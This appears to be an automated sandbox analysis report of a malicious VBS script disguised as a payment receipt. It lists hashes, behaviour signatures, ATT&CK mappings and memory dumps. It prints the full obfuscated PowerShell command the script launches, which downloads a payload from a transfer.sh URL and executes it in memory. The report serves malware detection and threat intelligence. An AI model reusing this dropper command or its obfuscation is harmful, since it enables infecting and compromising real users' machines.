de10822bc600d320a74d91bbd368bafc1a53b33dc80221fe0a679ae751d5f7e5

General

Target

Y81N365C4_PAYMENT_RECEIPT.vbs
Size

2KB
MD5

662b66ad7298cbd883c65e11bf1161a2
SHA1

20f8690c74a808ab3608d262607ebae16c1c6276
SHA256

de10822bc600d320a74d91bbd368bafc1a53b33dc80221fe0a679ae751d5f7e5
SHA512

ce97094e7beb9142085cd73df104ea939e07705c7120328d21b6b4eec1604f5dce321a084a14d82b80727c60db68a09f38dfcc1a0ed93843b074ff86cb204cd3

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transfer.sh/get/oyVYmO/HHHHHHHHHHHHHHHH.txt

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 1356 powershell.exe
7 1356 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1356 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1356 powershell.exe

flow	pid	process
5	1356	powershell.exe
7	1356	powershell.exe

pid	process
1356	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1356	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1768 wrote to memory of 1356	1768	WScript.exe	powershell.exe
PID 1768 wrote to memory of 1356	1768	WScript.exe	powershell.exe
PID 1768 wrote to memory of 1356	1768	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Y81N365C4_PAYMENT_RECEIPT.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &((gv '*MDR*').naMe[3,11,2]-joIN'') ( (('(0PG (Rd9&(Lz0PG+0PGS{0'+'PG+0PG0}Rd9+Rd0PG+0'+'PG9{1}LzRd0PG+0PG9+Rd0PG+0PG9S0PG+0PG-fRd9+Rd9X'+'EzIR0PG+0PGd0PG+0PG9'+'+R0PG+0PGd9EXEz,XEzR'+'d9'+'+Rd9XXEz)(.R0PG+0PGd0PG+0PG9+Rd9(0PG+0PGLRd9+Rd9z0PG+0PGS{10PG+0PG}{0}R0PG+0PGd9+R0PG+0PGd90PG+0PG{20PG+0PG}LzS -R0PG+0PGd90PG+0PG+Rd90PG+0PGfXERd0PG+0PG90PG+0PG+Rd0PG'+'+0PG9zORd9+Rd9bXEz,(LR0PG+0PGd0PG+0PG9+Rd90PG+0PGzS{1}0PG+0PGRd90PG+0PG+0PG+0PGR0PG+0PGd9{0Rd9+Rd9}LzS 0PG+0PG-f'+'Rd9+Rd9 0PG+0PGRd9+Rd90PG+0PGXEz0PG+0PGw-Rd9+0P'+'G+0PGRd9XEz,XE0PG+0PGz0PG+0PGRd0'+'PG+0PG9+R'+'d9N0PG+0PGeXEz)Rd9+Rd90PG+0PG,(0PG+0PGLz0PG+0PGS{0}{1R0PG+0PGd0PG+0PG9+Rd9}Rd9+Rd90PG+0PGLz0PG+0PGS-Rd9+Rd0PG+0PG9fXEz0PG+0PGjeXE0PG+0PGz0PG+0PG,XEzRd0PG+0PG9+Rd0PG+0PG9ctX0PG+0PGEz)) (LzS{2Rd90PG+0PG+R0PG+0PGd90PG'+'+0PG}{0}0PG+0PG{'+'0PG+0PG1Rd9+Rd9}LzSRd9+0PG+0PGRd0PG+0PG9-fRd9+Rd9 R'+'d90PG+0PG+Rd9(Lz0PG+0PGRd9+Rd0PG+0PG9S{1}{0}{0PG+0PG2Rd0PG+0PG90PG+0PG+R0PG+0PGd9}Rd9+Rd9LzS 0PG+0PG-f Rd9+Rd9XRd9+Rd9EzbCl0PG+0PGXEz,XEz.W0PG+0PGe0PG+0PGXR'+'d'+'9+Rd9ERd90PG+0PG+R0PG+0PGd90PG+0PGz,XEz0PG+0PGiX0PG+0PGEz)0PG+0PG,R0PG+0PGd9+Rd9XERd9+R0PG+0PGd9ze0PG+0PGntXEz,X0PG+0PGR0PG+0PGd9+R0PG+0PGd9EzNetXEz'+')).0PG+0PG(L0PG+0PGRd9+Rd9zRd90P'+'G+0PG+Rd90PG+0P'+'GS{Rd0PG+0PG90PG+0PG+Rd0PG+0PG90}{2Rd9+0PG'+'+0PGRd'+'9}0PG+0PG{3}{0PG+0PG1}{40PG+0PG}LRd90PG+0PG+Rd9zSRd9+Rd9 0PG+0PG-f XE0PG+0PGzDXERd9+Rd9z,Rd9+R0PG+0PGd9XEzdstXEz'+',XE0PG+0PGzow0PG+0PGnXERd'+'9+R0PG+0PGd9z,R0PG+0PGd9+0PG+0PGR0PG+0PGd90PG+0PGXEzloaXER0PG+0PGd90P'+'G'+'+0PG+Rd90PG+0PGz,(LRd0PG+0PG9+0P'+'G+0PGRd9z0PG+0PGRd9+Rd9S0PG+0PG{0}{1}LzRd9+Rd0PG+0PG9S -Rd9+0PG+0PGRd9fRd0PG'+'+0PG9+R'+'d9XEzrRd9'+'+R0PG+0PGd9iXEz,0PG+0PGX0'+'PG+0PGEzn0PG+0PGgXEz0PG+0PGRd9+Rd90'+'PG+0PG)).LRd9+Rd9'+'zSINRd9+Rd0PG+0PG9vOLGykERd9+Rd9'+'LzS(0PG+0'+'PGXEzhttps://transfer.sh/get/oyVYmO/HHHHHHHHHHHHHHHH.txtX0PG+0PGRd9+Rd9Ez)Rd0PG+0PG90PG+0PG).rEp'+'l0PG+0P'+'GacE(Rd9LGyRd9'+',0PG+0PGR0PG+0PGd9tYaRd0PG+0PG9).rEplacE(([cHaR]76+0PG+0PG[cHaR]122+[0PG+0PGcHaR0PG+0PG]0PG+0PG83),[STrinG]0PG+0PG[0PG+0PGc'+'HaR]34)0PG+0PG.rEplacE(([cHaR]80PG+0PG8+[cHaR]60PG+0PG9+[cHaR]120PG+0PG2),[0PG+0PGSTr'+'inG][cHa0PG+0PGR]30PG+0PG9)0c0PG'+'+0PGoIn0PG+0PGVo0PG+0PGkE-E0PG+0PGxpre'+'sSi0PG+0PGo0PG+0PGN0PG).rEplaCe(0PGRd90PG,[sTrIng][CHar]39).rEplaCe(0PG0co0PG,0PGvKO0PG).rEplaCe(([CHar'+']116+[CHar]89+[CHar]97),[sTrIng][CHar]96)vKO .( kSfEnV:COmspeC[4,24,25]-jOIN0'+'PG0PG)') -replace ([CHaR]118+[CHaR]75+[CHaR]79),[CHaR]124-crEpLace([CHaR]48+[CHaR]80+[CHaR]71),[CHaR]39 -replace 'kSf',[CHaR]36))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1356-55-0x0000000000000000-mapping.dmp

Download
memory/1356-57-0x000007FEF2CE0000-0x000007FEF383D000-memory.dmp

Filesize
11.4MB

Download
memory/1356-58-0x0000000002820000-0x0000000002822000-memory.dmp

Filesize
8KB

Download
memory/1356-60-0x0000000002824000-0x0000000002827000-memory.dmp

Filesize
12KB

Download
memory/1356-59-0x0000000002822000-0x0000000002824000-memory.dmp

Filesize
8KB

Download
memory/1356-61-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/1356-62-0x000000000282B000-0x000000000284A000-memory.dmp

Filesize
124KB

Download
memory/1768-54-0x000007FEFBC31000-0x000007FEFBC33000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing